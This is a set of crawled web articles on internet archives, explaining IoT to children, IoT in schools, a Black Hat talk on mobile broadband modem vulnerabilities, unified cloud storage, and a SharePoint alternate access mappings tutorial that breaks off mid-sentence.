their own archives, some of which can be found by conducting a keyword search on Google. Some of these sites, however, are pay services, and Google can't access their archives, so there's no way to ensure your words are completely within your control. Perhaps the best strategy, if you don't want your words to come back and haunt you, is to remember your mother's advice: Think before you speak. Another option is to use a pseudonym or "handle." The flip side of Internet archive services is their usefulness in helping you find what might otherwise have been lost.
<urn:uuid:a03ae939-1b72-4847-8cb5-52a13fcd2bba>
CC-MAIN-2017-09
http://www.govtech.com/magazines/gt/Internet-Archive-Services-Preserve-Your-Words.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501170404.1/warc/CC-MAIN-20170219104610-00495-ip-10-171-10-108.ec2.internal.warc.gz
en
0.964145
672
2.765625
3
The definitive definition of IoT from the experts for the kids (and adults, too). Eileen O’Mara, VP sales EMEA at salesforce.com "Imagine if a car, a kettle and your toothbrush could all speak to you. The car could let you know that its tires need air, the kettle that the boiled water is cooling and you should hurry up and make that cup of tea before it gets too cold, and your toothbrush lets you know when you’ve brushed your teeth for two minutes as it’s best to keep your teeth healthy. "In the Internet of Things, the car, the kettle, your toothbrush and many other things become smart and get a voice. This means they can communicate with you even when you’re not around, and you can control them remotely – all through an app on your phone." Richard Holway, chairman of TechMarketView, (tested on my five-year-old Godson, Harry) "Imagine if your cat went missing and you could find out exactly where it was. Imagine if your fridge could order your favourite juice from the supermarket rather than Mummy forgetting. Imagine if Daddy could warm up the car before you got in to go to school. Imagine if, when Grandma was ill, the doctor could be called immediately. Imagine if your toys could speak to one another. Imagine the ‘Internet of Things’. Reality sooner than you think!" Andrew Roughan, product and marketing director at Infinity SDC "Talking to another person is usually interesting, we use facial expressions and gestures which help us convey our point so other people know what we want and how we feel. "People are good as this because we have been doing it for a long time, but we’re not very good at talking to inanimate objects, like toys, computers, or listening to machines that give us choices. "We’re really slow at doing this because things don’t speak the same language as us. However, we have made computers and appliances become really smart, and clever people have made them talk to each other in a different language. These clever people have let the things that matter to us, like our home and computers in shops talk to each other, without us people getting in the way. "We have put together a network called the ‘Internet of Things’, which connects all of the ‘things’ together so they can communicate. For example, imagine never having to wait for the oven to heat up to cook dinner, as Mummy and Daddy could turn it on using their mobile phone in the park." Professor Amir Sharif, Acting Head of Brunel Business School "The "Internet of Things" (IoT for short) is an exciting and developing idea that suggests you will no longer need to have a computer to access or be connected to the Internet. "Science fiction is rapidly turning into fact. It is no longer a vision of the future. You can now really talk into your watch (or at least communicate through it) and use it as phone. The future is happening as we speak, and many companies are creating this for us. So things that aren’t computers are already connected to the internet. "Do you like running? Chances are your run is fuelled not only by music through your smartphone/MP3 player, but is also monitored for your heart rate, number of steps taken and calories burned. A combination of Apple i-devices (ipods and iphones of all varieties) and Nike’s Fuel Band are existing IoT devices already. "Do you wear a watch? Well, of course, now you can have a smart-watch which links with your phone so you can speak into your wrist to your friends. We have Samsung and their Samsung Gear gadgets to thank for that. "Do you wear glasses? I think you can guess where this is going – yes, we now have the very cool Google Glass technology which overlays what you see through your eyes on the surface of the spectacles you wear, with internet-sourced information displayed in real time (which is known as ‘Augmented’ Reality, adding digital information to what you’re seeing of actual things around you). "Do you have a home and want to heat it? Imagine having the ability to not only control your own electricity consumption remotely, but to allow your own house to manage your energy usage and consumption. Technologies such as Nest provide this and many more "smart home" technologies including remote lighting. "Wonderful gadgets, most of which are now beginning to display real utility and benefit to our daily lives. But the exciting part about IoT is not just where these connected ‘things’ are now and what they can do for us at present, but where this will take us. "Scientists, technologists and businesses are rapidly considering a time when even wearable computers will become a thing of the past. Companies such as Intel have proposed that for an internet of things needs to completely invisible – you shouldn’t have to even see or recognise an object as being connected to the internet. It will just naturally be connected and "on" all the time. "So my advice is: enjoy your smart and Internet-connected devices while you can still see them. Eventually they might even be embedded within us – and we might become a ‘thing’ within the Internet as well."
<urn:uuid:7f9a1363-7129-4114-bdd5-e0bae1646f78>
CC-MAIN-2017-09
http://www.cbronline.com/news/enterprise-it/15-ways-to-explain-the-internet-of-things-iot-to-a-five-year-old-4315594
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501171629.92/warc/CC-MAIN-20170219104611-00547-ip-10-171-10-108.ec2.internal.warc.gz
en
0.971825
1,125
3.046875
3
Once seen as the bane of classroom attention spans, Internet of Things connected devices are now becoming standard operational and teaching tools in schools where they enhance how students interact with information, make it easier for schools to monitor and address student safety, and reduce many stresses for students, teachers, and parents. Education in the Cloud The cloud's ability to store, organize, and search information is saving teachers time and saving schools money. Teachers can now make class work and lessons available to students on the cloud, so they no longer need to print material for every student in a given class, which also saves the school money on ink and paper. Multiple-choice quizzes can be administered online and graded automatically, giving teachers more time to plan their classes instead of tediously hand-grading tests and quizzes. The cloud also teaches students to collaborate more effectively while acclimating them to digital tools that are widely used in the real world. For example, Google Suites’ collaborative editing features on programs such as Docs and Slides make it simple for students to collaborate on documents and presentations in real-time. And what if a student forgot their homework assignment? Teachers can place assignments in a Google Drive or other online storage folders for access from any cloud-connected device so that forgetting course materials will no longer be a concern. Notes, resource materials, and assignments stored in the cloud are easily searchable, which teaches students valuable organization skills while ensuring they don’t miss an assignment. Using IoT for Roll Call With admission rates for schools continuously on the rise, monitoring attendance and safety has become a challenge for school districts. Attendance benchmarks need to be reached to ensure state funding requirements are met. Sometimes students aren’t in the class where attendance is being taken; they could be in the nurse's office or detention. School ID badges embedded with RFID chips and specialized sensors placed throughout campus let schools automatically account for all students on campus and see exactly where they are. This has raised privacy concerns among parents, but RFID accountability has the potential of saving student lives in case of an emergency. For example, if there’s a fire, faculty can receive text alerts to quickly see if students are still in the building after the evacuation process. GPS Tracking for School Buses Getting ready in the morning is often the most Herculean task accomplished in the day: making breakfast, packing lunch, getting the kids ready, and sending them out to catch the bus is enough stress for any parent without wondering if the bus will be on time on a given day. Wouldn’t it be a relief to know exactly when the bus was coming to ensure your child isn’t in the street any longer than necessary? Wouldn’t it also be nice to know your child arrived home safely if you can’t be there to pick them up? Schools are now using the same GPS technology used to monitor commercial shipping fleets to monitor buses. Families with multiple children can receive alerts to let them know which child needs to head out at what time, eliminating the stress caused by juggling multiple bus schedules. The Austin Statesman reported that all school buses in the Austin Independent School District can now be tracked from a smartphone app. As more educational institutions tap into the power of Internet of Things technology, teachers and students will undoubtedly become more connected through IoT. If you’re developing education-related IoT apps or devices, Aeris connectivity is available to get you up and running to help schools move into the future. Find out about the many options for IoT technology, connectivity, and devices in our whitepaper.
<urn:uuid:758ce80b-e7bf-4984-8300-b3c18166f55f>
CC-MAIN-2017-09
http://blog.aeris.com/how-iot-enhances-education
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501170993.54/warc/CC-MAIN-20170219104610-00543-ip-10-171-10-108.ec2.internal.warc.gz
en
0.947498
734
2.875
3
Let’s say you have your laptop and you need to get online, but you don’t trust a public wireless network such as at Starbucks or McDonalds and you don’t otherwise have access to an Ethernet cable; for some people, to the tune of about 100 million devices, the answer to this dilemma is to use a mobile broadband modem in the form of a USB dongle to access the Internet via a cellular network. But in the Black Hat USA presentation, “Attacking mobile broadband modems like a criminal would,” Andreas Lindh explained how easily attackers can remotely exploit multiple security vulnerabilities in many of those devices. Most mobile broadband modems, sometimes referred to as connect cards or data cards, are made by Huawei and ZTE. Those manufacturers sell many of the devices to wireless carriers who then resell the modems to their customers. The modems usually run embedded Linux and work in manner similar to Wi-Fi routers; but unlike regular routers, these modems are meant to be plugged into a USB port and be used by a single user. The modem has an embedded web server that is used to configure the device. Since the administration web page cannot be accessed wirelessly, not much attention has been focused on securing this server. In fact, there isn’t even a password to protect the admin page. Although there has been research into vulnerabilities and how to exploit these devices in the past, the attacks were so complex that they required substantial skills and effort to pull off. Lindh, who works for ISecure Sweden, said there are much easier ways to profit from attacking the modems. “Criminals like the easiest way. Their objective is to get paid. This is the path of least resistance. They’re going to take the path of least resistance,” Lindh said before adding, “And these attacks have great potential for paying off.” One of those attacks would allow an attacker to change the settings on the modem. Although the user may not be able to see the pre-installed profile for how the device will connect, Lindh said an attacker could still change those settings. “I’m actually able to modify the network settings of the modem,” Lindh told Tech Page One. “Just by having users go into a webpage, I can alter the DNS settings. If I can do that, I can point them to my own DNS and then control where they go on the Internet.” An attacker could use a DNS poisoning attack to direct a user toward a site that appeared to be Facebook, but wasn’t, in order to grab the victim’s credentials. Lindh said, “Or, if I want to make it really easy for myself, I can just get paid for sending people to ads.” An attacker could create a persistent backdoor in several ways. One is by “spoofing the server that the modems use to download firmware updates” and installing malicious firmware. “Exploiting cross-site scripting (XSS) vulnerabilities in the modems’ administrative interfaces” would allow malicious code to be stored in the modem’s configuration to provide an attacker with continued access. Another way an attacker could setup a stealthy backdoor into the victim’s modem is via exploiting SMS functionality to implant malicious code. Lindh believes that criminals will most likely attack the SMS functionality in the modem. He said, “These devices are basically just cell phones that you can’t make a call with. SMS definitely will be abused. There’s a million ways to do this.” Attackers could exploit SMS functionality to steal personal data or to send SMS to a premium-rate number controlled by the attacker. Several years ago, F-Secure’s Mikko Hypponen explained this type of premium-rate SMS fraud in a Black Hat presentation titled, “You will be billed $90,000 for this call.” Lindh advised people not to underestimate these risks because, bottom line, a criminal wants paid and will take the easiest path to that pay day. “The update model is utterly broken for these modems,” he said. “The vendors have to do one patch for each carrier, then the carrier has to decide whether to send it to their users and the users have to decide whether to install it. Most of these devices will never be patched.” On the same day of Lindh’s Black Hat presentation, Huawei released a security advisory and updated software fixes for Huawei HiLink E3236 and E3276 as the devices are vulnerable to cross-site request forgery (CSFR) attacks. Attackers can create a website that contains malicious scripts and lure E3236 and E3276 users to the website. After users visit the website and execute the malicious scripts, the malicious scripts can send illegitimate posts from the computers of the users to change the configurations or use the functions of the E3236 and E3276. After crediting Lindh for finding the vulnerability, Huawei said it “is not aware of any malicious use of the vulnerability described in this advisory.” There is no temporary fix, so customers are advised to contact Huawei to request the upgraded software that contains the fix.
<urn:uuid:1dc06524-b5d3-4e59-9dbe-b9c3bd9484dd>
CC-MAIN-2017-09
http://www.computerworld.com/article/2476550/cybercrime-hacking/black-hat-talk-exposes-how-easily-criminals-can-hack-mobile-broadband-modems.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501170993.54/warc/CC-MAIN-20170219104610-00543-ip-10-171-10-108.ec2.internal.warc.gz
en
0.939988
1,102
2.78125
3
Unified Storage for the Cloud Means Higher-Level Interfaces In common use, the term “unified storage” means providing block-level and file-level access to the same storage system with a single management and control interface. Traditionally, block-level access is via fiber channel or iSCSI, and file-level access is via NFS or CIFS protocol. Recently, storage vendors are also adding _object_-level storage where the objects are entities with metadata like type, access control policies. Objects are read and written by applications using REST HTTP or SOAP and used directly at the application level. The most popular API is Amazon’s S3 (Simple Storage Service). With the higher-abstraction level of objects, the underlying implementation (e.g., number of parts, tiered storage, etc.) is hidden even more than with block- and file-level interfaces. EMC, Hitachi Data Systems, and NetApp among others provide unified storage systems. Cloud storage is bringing some different requirements for a unified storage system. Most notably, not only is the data in the cloud, but the applications and compute resources are in the cloud. Instead of pulling data from the cloud, processing the data, and pushing back to cloud, the paradigm is to have compute resources in the cloud read and write data directly, local to the cloud. The data is never moved out of the cloud unless absolutely needed. This type of usage pushes the need for even higher-level interfaces to data like SQL, Map-Reduce, and ETL. Unified storage for the cloud needs to do more than provide multi-protocol access to data that can be managed with one system. In addition to access, there must be the ability to process the data, e.g., running an SQL query. Then applications can easily use the functionality of the cloud storage/compute system instead of using the cloud as a dumb storage system and pulling and pushing the data between the cloud storage system and compute resources. Unified storage for block- and file- level is still required and important because of the need to integrate with compute nodes that have a block-level or file-level interface. And also, there is the cloud data bootstrap problem of how do you initially get the data in the cloud that can be efficiently done by block-level transfer. The power of a unified cloud storage system is in the network effect of having a single management interface that allows managing users, multiple tenants, storage and resource quotas, security, access management with ACLs (access control lists) for sharing, and other functions. With the single management interface, the system administrator can effectively control the backend storage system used in a wide variety of users using a small slice of different functionality (e.g., object storage only) or users using a wide scope of data access and processing. By Gary Ogasawara Gary Ogasawara is the VP Engineering at Gemini Mobile Technologies. He has worked on large scale mail systems for service providers and other high-performance, high-volume software systems. Gemini’s Cloudian™ product is an S3-compatible storage software package. Read additional information on Cloud Computing News on CloudTweaks
<urn:uuid:86e9af6c-9f58-41fa-99f2-f67aaac1a0e1>
CC-MAIN-2017-09
https://cloudtweaks.com/2012/06/unified-storage-for-the-cloud-means-higher-level-interfaces/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501171632.91/warc/CC-MAIN-20170219104611-00243-ip-10-171-10-108.ec2.internal.warc.gz
en
0.905234
660
2.625
3
Leroy Chiao holds a special distinction: Not only did the American astronaut fly on three shuttle flights and serve as the commander of the tenth expedition to the International Space Station; he is also the first person ever to vote for president from space. Chiao cast his ballot from the International Space Station during the 2004 campaign. And that makes him not just the first person to vote for president from zero gravity, but also one of only a handful of people ever to vote from beyond Earth's borders. In 1997, David Wolf became the first person to cast an absentee ballot from space; he voted in a Texas municipal election from the Mir space station. In 2008, Michael Fincke and Gregory Chamitoff used electronic ballots to vote in both local and national elections. As for yesterday's election, the two Americans aboard the ISS for the 2012 cycle -- Suni Williams and Kevin Ford -- took care of voting before they launched: They made their choices via terrestrial absentee ballot while they were stationed in Russia. Chiao and his fellow space-voters benefitted from a bill passed in 1997 by Texas legislators, which established a procedure for astronauts -- most of whom reside in Houston -- to vote from space. (The bill was signed by then-governor George W. Bush.) The system uses the same email-based procedure employed by U.S. residents who live overseas at the time of an election. In Chiao's case, an electronic ballot, generated by the Galveston County Clerk's office, was emailed to his secure account at NASA's Johnson Space Center. Mission Control then transferred that email to the space station, and to Chiao within it, using a high-speed modem via satellite -- the same way astronauts receive all their emails while they're aboard the ISS.
<urn:uuid:67955f7a-13a0-48ba-b16e-d6e1610821ec>
CC-MAIN-2017-09
http://www.nextgov.com/emerging-tech/2012/11/what-its-vote-president-space/59347/?oref=ng-channelriver
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501172649.58/warc/CC-MAIN-20170219104612-00595-ip-10-171-10-108.ec2.internal.warc.gz
en
0.970823
360
2.84375
3
Remembering what the programming world was like in 1995 is no easy task. Object-oriented programming, for one, was an accepted but seldom practiced paradigm, with much of what passed as so-called object-oriented programs being little more than rebranded C code that used >> instead of class instead of struct. The programs we wrote those days routinely dumped core due to pointer arithmetic errors or ran out of memory due to leaks. Source code could barely be ported between different versions of Unix. Running the same binary on different processors and operating systems was crazy talk. Java changed all that. While platform-dependent, manually allocated, procedural C code will continue to be with us for the next 20 years at least, Java proved this was a choice, not a requirement. For the first time, we began writing real production code in a cross-platform, garbage-collected, object-oriented language; and we liked it ... millions of us. Languages that have come after Java, most notably C#, have had to clear the new higher bar for developer productivity that Java established. James Gosling, Mike Sheridan, Patrick Naughton, and the other programmers on Sun’s Green Project did not invent most of the important technologies that Java brought into widespread use. Most of the key features they included in what was then known as Oak found its origins elsewhere: - A base Object class from which all classes descend? Smalltalk. - Strong static type-checking at compile time? Ada. - Multiple interface, single implementation inheritance? Objective-C. - Inline documentation? CWeb. - Cross-platform virtual machine and byte code with just-in-time compilation? Smalltalk again, especially Sun’s Self dialect. - Garbage collection? Lisp. - Primitive types and control structures? C. - Dual type system with non-object primitive types for performance? C++. Java did, however, pioneer new territory. Nothing like checked exceptions is present in any other language before or since. Java was also the first language to use Unicode in the native string type and the source code itself. But Java’s core strength was that it was built to be a practical tool for getting work done. It popularized good ideas from earlier languages by repackaging them in a format that was familiar to the average C coder, though (unlike C++ and Objective-C) Java was not a strict superset of C. Indeed it was precisely this willingness to not only add but also remove features that made Java so much simpler and easier to learn than other object-oriented C descendants. Java did not (and still does not) have header files. An object-oriented language not shackled by a requirement to run legacy code didn’t need them. Similarly Java wisely omitted ideas that had been tried and found wanting in other languages: multiple implementation inheritance, pointer arithmetic, and operator overloading most noticeably. This good taste at the beginning means that even 20 years later, Java is still relatively free of the “here be dragons” warnings that litter the style guides for its predecessors. Still, applets were what inspired us to work with Java, and what we discovered was a clean language that smoothed out many of the rough edges and pain points we’d been struggling with in alternatives such as C++. Automatic garbage collection alone was worth the price of admission. Applets may have been overhyped and underdelivered, but that didn’t mean Java wasn’t a damn good language for other problems. Originally intended as a cross-platform client library, Java found real success in the server space. Servlets, Java Server Pages, and an array of enterprise-focused libraries that were periodically bundled together and rebranded in one confusing acronym or another solved real problems for us and for business. Marketing failures aside, Java achieved near-standard status in IT departments around the world. (Quick: What’s the difference between Java 2 Enterprise Edition and Java Platform Enterprise Edition? If you guessed that J2EE is the successor of JEE, you got it exactly backward.) Some of these enterprise-focused products were on the heavyweight side and inspired open source alternatives and supplements such as Spring, Hibernate, and Tomcat, but these all built on top of the foundation Sun set. Arguably the single most important contribution of open source to Java and the wider craft of programming is JUnit. Test-driven development (TDD) had been tried earlier with Smalltalk. However, like many other innovations of that language, TDD did not achieve widespread notice and adoption until it became available in Java. When Kent Beck and Erich Gamma released JUnit in 2000, TDD rapidly ascended from an experimental practice of a few programmers to the standard way to develop software in the 21st century. As Martin Fowler has said, "Never in the field of software development was so much owed by so many to so few lines of code," and those few lines of code were written in Java. Twenty years since its inception, Java is no longer the scrappy upstart. It has become the entrenched incumbent other languages rebel against. Lighter-weight languages like Ruby and Python have made significant inroads into Java’s territory, especially in the startup community where speed of development counts for more than robustness and scale -- a trade-off that Java itself took advantage of in the early days when performance of virtual machines severely lagged compiled code. Java, of course, is not standing still. Oracle continues to incorporate well-proven technologies from other languages such as generics, autoboxing, enumerations, and, most recently, lambda expressions. Many programmers first encountered these ideas in Java. Not every programmer knows Java, but whether they know it or not, every programmer today has been influenced by it. - Review: The big 4 Java IDEs compared - Java forever! 12 keys to Java's enduring dominance - Java vs. Node.js: An epic battle for developer mind share This story, "Java at 20: How it changed programming forever" was originally published by InfoWorld.
<urn:uuid:0b66bb80-bad3-4ade-a811-4bc2b5ea3e34>
CC-MAIN-2017-09
http://www.itnews.com/article/2923773/java/java-at-20-how-java-changed-programming-forever.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501170521.30/warc/CC-MAIN-20170219104610-00539-ip-10-171-10-108.ec2.internal.warc.gz
en
0.955864
1,265
3.34375
3
Women aged 25 to 34 are most likely to fall victim to online scams, according to research published today. The research was commissioned by a online advice site, knowthenet.org.uk, to build up a picture of the likeliest online scam victims. It measured the ability of more than 2,000 consumers to spot and respond appropriately to seven online scam scenarios. The tests ranged from identifying fake Facebook pages to testing how consumers respond to competition scams or the sale of counterfeit goods online. By submitting your personal information, you agree that TechTarget and its partners may contact you regarding relevant content, products and special offers. In six out of the seven tests, women proved the most likely to fail, and most of those were in the 25-34 age group. However, the most likely victim depended on the type of scam. For example, among those who fell for confidence tricks, 53% were men. With internet scams on the rise, this means anyone, whether they use the internet regularly or not, could be at risk, the research concluded. "Scammers are becoming more devious in how they target victims and are constantly changing their attacks to reflect what people expect to see online or are interested in," said Peter Wood, security expert at knowthenet.org.uk. New tricks, such as pharming, work by redirecting the user's web browser, he said, so that when they type in a legitimate web address, they are redirected without knowing to a bogus site that appears genuine. "People then happily type in their personal details and don't know they are being scammed before it's too late," he said. The popularity of social networks such as Facebook also means many people give away far too much personal data on the web, said Wood, which can be a goldmine for scammers. Launched by Nominet, the knowthenet.org.uk site was developed to provide independent advice and support on getting started online, staying safe online, and doing business online. Online fraud affects 1.8 million Britons every year, costing the economy £2.7bn, according to National Fraud Authority research published in January 2010.
<urn:uuid:d5c4591e-8439-4f88-bb47-8eb53bd06d27>
CC-MAIN-2017-09
http://www.computerweekly.com/news/1280094314/Young-women-are-the-most-likely-victims-of-online-scams-research-shows
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501171646.15/warc/CC-MAIN-20170219104611-00591-ip-10-171-10-108.ec2.internal.warc.gz
en
0.973464
448
2.5625
3
Science.gov launches a new version - By Doug Beizer - Sep 23, 2008 A new version of Science.gov — a free, single-search gateway for science and technology information from 17 organizations in 13 federal science agencies — was launched recently. Science.gov 5.0 lets users to search additional collections of science resources. It also makes it easier to target searches and find links to information on a variety of science topics. The Energy Department hosts the site that was announced Sept. 15. The new version of the Web gateway has seven new databases and portals which allow researchers access to more than 200 million pages of scientific information. New information available includes thousands of patents from Energy Department research and development, documents and bibliographic citations of DOE accomplishments, the department said. Science.gov 5.0 also has a clustering tool which helps target searches by grouping results, by subtopics or dates.The new version of the Web site also provides links to related EurekAlert! Science News and Wikipedia, and provides the capability to download research results into personal files or citation software. Science.gov is hosted by DOE’s Office of Scientific and Technical Information in DOE’s Office of Science. It is supported by contributing members of the Science.gov Alliance that include the Agriculture, Commerce, Defense, Education, Health and Human Services, and Interior departments, the Environmental Protection Agency, the Government Printing Office, the Library of Congress, NASA and the National Science Foundation. Doug Beizer is a staff writer for Federal Computer Week.
<urn:uuid:9a505d56-ebb0-4286-9559-27524632e744>
CC-MAIN-2017-09
https://fcw.com/articles/2008/09/23/sciencegov-launches-a-new-version.aspx
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501171646.15/warc/CC-MAIN-20170219104611-00591-ip-10-171-10-108.ec2.internal.warc.gz
en
0.916845
317
2.71875
3
NASA looks to space for better earthquake data - By Henry Kenyon - Apr 27, 2012 A space-based earthquake detection system will soon be providing scientists and first responders with accurate and precise real-time data about the location and intensity of a seismic event. The prototype system, which NASA is testing on the West Coast, uses satellites to monitor ground-based Global Positioning System sensors for minute changes in their location. The Real-time Earthquake Analysis for Disaster (READI) Mitigation Network uses GPS data streamed in from about 500 ground stations across California, Oregon and Washington. Earthquakes are something to tweet about Predicting earthquake risks and effects around the world When a major earthquake occurs, the GPS data is used to automatically calculate its location, magnitude and other geological details, NASA said in a release announcing the project. READI is based on decades of research by the National Science Foundation, the Defense Department, NASA and the U.S. Geological Survey. Conventional seismic networks have had difficulty in pinpointing the true size of the major earthquakes of the past decade, Timothy Melbourne, director of Central Washington University’s Pacific Northwest Geodetic Array, said in a statement. “This GPS system is more likely to provide accurate and rapid estimates of the location and amount of fault slip to fire, utility, medical and other first responder teams,” he said. Rapidly identifying and locating earthquakes of magnitude 6.0 and higher is vital for first response and disaster mitigation efforts, especially when there is the possibility of a tsunami, NASA said. Precise, by-the-second measurements of ground displacement with GPS-based sensors has been demonstrated to reduce the time needed to verify the scale and location of a large earthquake and to increase the accuracy of tsunami predictions. After the READI network’s capabilities have been fully tested and demonstrated, it will be handed over to federal natural disaster monitoring agencies such as the USGS and the National Oceanic and Atmospheric Administration. A number of institutions are collaborating to support and operate the READI network. They include Scripps at the University of California in San Diego; Central Washington University in Ellensburg; the University of Nevada in Reno; California Institute of Technology/Jet Propulsion in Pasadena; UNAVCO in Boulder, Colo.; and the University of California at Berkeley. The GPS stations in the network are supported by NASA, NSF, USGS and other federal, state and local organizations.
<urn:uuid:b2fe423e-5d57-415d-9bfb-56e89df019bb>
CC-MAIN-2017-09
https://gcn.com/articles/2012/04/27/nasa-space-based-earthquake-detector.aspx
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501170823.55/warc/CC-MAIN-20170219104610-00412-ip-10-171-10-108.ec2.internal.warc.gz
en
0.926138
511
3.09375
3
What is M2M, and why is it the future of code? - By John Breeden II - Mar 22, 2013 The next great horizon may well be machine-to-machine (M2M) technology. At the recent Oracle conference, the company was touting "an ecosystem of solutions" that uses embedded devices to facilitate real-time analysis of events and data among the "Internet of Things," according to the Dr. Dobbs website. Much of the M2M information is delivered in the form of sparse data, which can come from sensors and other non-IT devices. The data may itself be only a couple kilobytes and wouldn’t make much sense out of context. But there is so much of it being generated and taken together it can create a full picture. Applications are needed to not only enable devices to talk with others using M2M, but also to collect all the data and make sense of it. Pretty much any device can be connected with M2M technology. In fact, Machina Research, a trade group for mobile device makers, predicts that within the next eight years, the number of connected devices using M2M will top 50 billion worldwide. That connected-device population will include everything from power and gas meters that automatically report usage data, to wearable heart monitors that automatically tell a doctor when a patient needs to come in for a checkup, to traffic monitors and cars that will by 2014 automatically report their position and condition to authorities in the event of an accident. Although M2M has actually been around since the early days of computing, it has recently evolved to where devices can communicate wirelessly without a human or centralized component. The most popular M2M setup thus far has been to create a central hub that accepts both wireless and wired signals from connected devices. Field sensors would note an event, be it a temperature change, the removal of a piece of inventory or even a door opening. They would then send that data to a central location where an operator might turn down the AC, order more toner cartridges or tell security about suspicious activity. The model for M2M in the future, however, eliminates the central hub and instead has devices communicating with each other and working out problems on their own. So an M2M device will be able to automatically turn on the AC in an overheated space, order more toner when it senses that supplies are low or alert security if a door opens at an odd hour. Many M2M devices rely on cellular technology to get their messages out, which is why mobile companies such as Verizon and Sprint are ramping up their M2M efforts. Devices don't have to communicate over the cell network, as many still use land lines. But the ability to do so, especially if they also have an independent power source like a battery for backup, untethers the devices from the organization they are assigned to. And the more the machine can operate independently, the more work it can do without human intervention. Humans probably will still need to be in the chain to oversee the different processes, but they will become more of a second pair of eyes and less of a direct supervisor. If everything goes well, the machines will do all the work, and the humans will only need to step in if a machine reports a problem, like a communications failure. With 50 billion connected devices coming online soon, the need for applications (and developers) to manage all of that, to make the connections between devices work and to make sure it all runs smoothly will be tremendous. Agencies wanting to know more about M2M development can visit the Eclipse Foundation to learn more. John Breeden II is a freelance technology writer for GCN.
<urn:uuid:fa176411-3b88-4e68-b687-7642b95ad6df>
CC-MAIN-2017-09
https://gcn.com/articles/2013/03/22/m2m-future-of-code.aspx
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501171670.52/warc/CC-MAIN-20170219104611-00288-ip-10-171-10-108.ec2.internal.warc.gz
en
0.945798
763
2.9375
3
Researchers have developed a new material for a basic battery component that they say will enable almost indefinite power storage. The new material -- a solid electrolyte -- could not only increase battery life, but also storage capacity and safety, as liquid electrolytes are the leading cause of battery fires. Today's common lithium-ion batteries use a liquid electrolyte -- an organic solvent that has been responsible for overheating and fires in cars, commercial airliners and cell phones. With a solid electrolyte, there's no safety problem. "You could throw it against the wall, drive a nail through it — there's nothing there to burn," said Gerbrand Ceder, a professor of materials science and engineering at MIT and one of the main researchers. Additionally, with a solid-state electrolyte, there's virtually no degradation, meaning such batteries could last through "hundreds of thousands of cycles," Ceder added. Organic electrolytes also have limited electrochemical stability, meaning they lose their ability to produce an electrical charge over time. Along with MIT, scientists from the Samsung Advanced Institute of Technology, the University of California at San Diego and the University of Maryland conducted the research. The researchers, who published their findings in the peer-reviewed journal Nature Materials, described the solid-state electrolytes as an improvement over today's lithium-ion batteries. Electrolytes are one of three main components in a battery, the other two being the terminals -- the anode and the cathode. A battery's electrolyte component separates the battery's positive cathode and negative anode terminals, and it allows the flow of ions between terminals. A chemical reaction takes place between the two terminals producing an electric current. A past problem with solid electrolytes is that they could not conduct ions fast enough to be efficient energy producers. The MIT/Samsung team says it overcame that problem. Another advantage of a solid-state lithium-ion battery is that it can perform under frigid temperatures. Ceder said solid-state electrolytes could be "a real game-changer" creating "almost a perfect battery." This story, "Samsung, MIT say their solid-state batteries could last a lifetime" was originally published by Computerworld.
<urn:uuid:1329c173-898a-4014-85ab-cca65a6e0de6>
CC-MAIN-2017-09
http://www.itnews.com/article/2973483/sustainable-it/samsung-mit-say-their-solid-state-batteries-could-last-a-lifetime.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501174215.11/warc/CC-MAIN-20170219104614-00164-ip-10-171-10-108.ec2.internal.warc.gz
en
0.94051
458
3.578125
4
Hello, and welcome to this video. My name is James Olorunosebi, and I will be your guide for this video tutorial. Today we will be looking at Alternate Access Mappings (AAM). So why do we have to use Alternate Access Mappings? We have to use alternate access mappings because typically because in a server environment you would have a server box. Now my handwritings and my drawings are pretty terrible. But we can make do with this. MCSE Training – Resources (Intense) Okay this is our server box. This server that belongs to our SharePoint farm, these servers already have names. In our scenario we have a server by the name SPS-SQLDB. This is the server name. And we have another server called, which is our domain controller, DCEX-1 (on screen diagram DEEX-1). Now when we install SharePoint, what SharePoint does is to take the name of the server and make it the default URL for the SharePoint installation. So, we would end up with a URL that is akin to this, http://sps-sqldb:2015. If we had installed SharePoint on this machine, the URL would have become http://dcex-1:2015 in similar fashion. Now when we create site collections in SharePoint, the site collections will also go with a similar name fashion. For example, we create a site collection in SharePoint, and we call this site collection say for example testlabintranet. We would end up with a URL of http://sps-sqldb, if it is sitting on port 80, the port 80 will not show, and it will be /sites/testlabintranet/default.aspx (http://sps-sqldb/sites/testlabintranet/default.aspx). Now, when users browse to our SharePoint site, this URL is what they would find. This URL has a problem. It is revealing the name of the server. The server box name is being exposed. In our office we have different kinds of people, or rather in our offices we have different kinds of people who visit, and many times, some of them are going to easily see the URL of the resources that we use and if those resources are bearing your exact server machine names, that becomes a problem. So what you should do – what alternate access mappings does, AAM, is to create, or cloak the server machine name and give end users, a user friendly name. Not only is it good for giving users user friendly names, it’s also for security reasons. So what we’ll do with AAM is, rather than have the site coming up with a name as this, in AAM we’ll configure what is known as Internal URL, and we’ll configure what is known as a Public URL. So the public URL is what we would have that will be for example, after we are through configuring it in the AAM settings will be http://testlab/sites and so on and so forth (http://testlab/sites/testlabintranet/default.aspx). Now for the demonstration on how to configure AAM (Alternate Access Mappings). Currently, we have our SharePoint site, let’s take this into full screen. Currently we have our SharePoint site sitting on this address, revealing the name of the server. We’ll have the site collections revealing the name of this server as well. It is not so much of a problem if as an administrator you come into your SharePoint environment and you have to work with your server name, after all, you are the administrator. But for our public users, our other users in the office, or the company, they should not have to work with this URL. Sometimes, this URL can become so complicated that many of them cannot remember it. So we have to give them something that they can easily remember. So we configure alternate access mappings. So for starters to make the name we are going to use in alternate access mapping in this location available, the first thing we’ll do is to go to the domain controller, and tell DNS (domain name system), “Hey DNS, this is the name we want you to look out for when users contact you for resources on SharePoint. When they send in this URL to you, take it, translate it to this other machine name or IP address, and let them give them the page that they want.” I go to the domain 